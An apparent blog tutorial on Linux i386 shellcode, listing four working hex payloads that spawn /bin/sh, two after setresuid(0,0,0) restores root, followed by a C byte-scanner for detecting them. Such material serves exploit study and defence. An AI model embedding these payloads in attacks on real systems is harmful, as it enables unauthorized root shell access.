02.Basic & Change permissions Shellcode

by RACC8N 2020. 5. 4. 11:32

* Basic Shellcode ("/bin/sh")

[C language]

Create execve /bin/sh shellcode

1. Check system call number : execve

2. Assembly code

3. Build & Run

* Change permissions shellcode (seteuid + "/bin/sh")

[C language]

1. Check system call number : setresuid

2. Assembly code

3. Build & Run

- The "setresuid(0,0,0)" code added to the shellcode restored the process's uid to root.

- Basic Shellcode

 execve("/bin//sh",["/bin//sh",NULL],[NULL]), length : 26

\x6a\x0b\x58\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80

- Smaller Basic Shellcode

 execve("/bin//sh",NULL,NULL), length : 22

\x6a\x0b\x58\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xca\xcd\x80

- Change permissions Shellcode

setresuid(0,0,0) + execve("/bin//sh",["/bin//sh",NULL],[NULL]), length : 35

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80

- Smaller Change permissions Shellcode

setresuid(0,0,0) + execve("/bin//sh",NULL,NULL) length : 29

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
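
For detection work, the byte patterns listed above can be recognised with a short heuristic scan. The following is an added example, not code from the original post: the function name classify_i386, the verdict enum and the benign buffer are assumptions made for illustration, and the two payload arrays are copied from the list above.

```c
#include <stdio.h>
#include <string.h>

/* Inputs: two of the i386 payloads listed on this page, plus a constructed benign buffer. */
const unsigned char basic_sh[] =
    "\x6a\x0b\x58\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
const unsigned char setresuid_sh[] =
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x52\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
const unsigned char benign[] = "GET /bin/sh HTTP/1.1\r\n";

enum verdict { CLEAN = 0, SHELL_EXEC = 1, SETRESUID_THEN_SHELL = 2 };

/* Heuristic byte scan, not a disassembler: remembers the last imm8 loaded into
   eax/al and checks it at each `int 0x80` (cd 80). Assumes the upper bytes of
   eax were zeroed before `mov al, imm8`, as the payloads on this page do. */
enum verdict classify_i386(const unsigned char *b, size_t n) {
    /* push "//sh" ; push "/bin": the stack-built path shared by all four payloads */
    static const unsigned char path[] = {0x68, '/', '/', 's', 'h', 0x68, '/', 'b', 'i', 'n'};
    int eax = -1, saw_path = 0, saw_setresuid = 0;
    for (size_t i = 0; i < n; ) {
        if (n - i >= sizeof path && !memcmp(b + i, path, sizeof path)) {
            saw_path = 1; i += sizeof path;
        } else if (n - i >= 3 && b[i] == 0x6a && b[i + 2] == 0x58) {
            eax = b[i + 1]; i += 3;                 /* push imm8 ; pop eax */
        } else if (n - i >= 2 && b[i] == 0xb0) {
            eax = b[i + 1]; i += 2;                 /* mov al, imm8 */
        } else if (n - i >= 2 && b[i] == 0xcd && b[i + 1] == 0x80) {
            if (eax == 164) saw_setresuid = 1;      /* setresuid is 164 (0xa4) on i386 */
            if (eax == 11 && saw_path)              /* execve is 11 (0x0b) on i386 */
                return saw_setresuid ? SETRESUID_THEN_SHELL : SHELL_EXEC;
            eax = -1; i += 2;
        } else {
            i++;
        }
    }
    return CLEAN;
}

int main(void) {
    printf("basic=%d setresuid=%d benign=%d\n",
           classify_i386(basic_sh, sizeof basic_sh - 1),
           classify_i386(setresuid_sh, sizeof setresuid_sh - 1),
           classify_i386(benign, sizeof benign - 1));
    return 0;
}
```

The scan keys on exact encodings, so a payload that loads eax differently or builds the path another way is not matched; treat a CLEAN verdict as "no known pattern", not as proof of absence.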

 

 

REF: https://www.lazenca.net/pages/viewpage.action?pageId=12190056

 
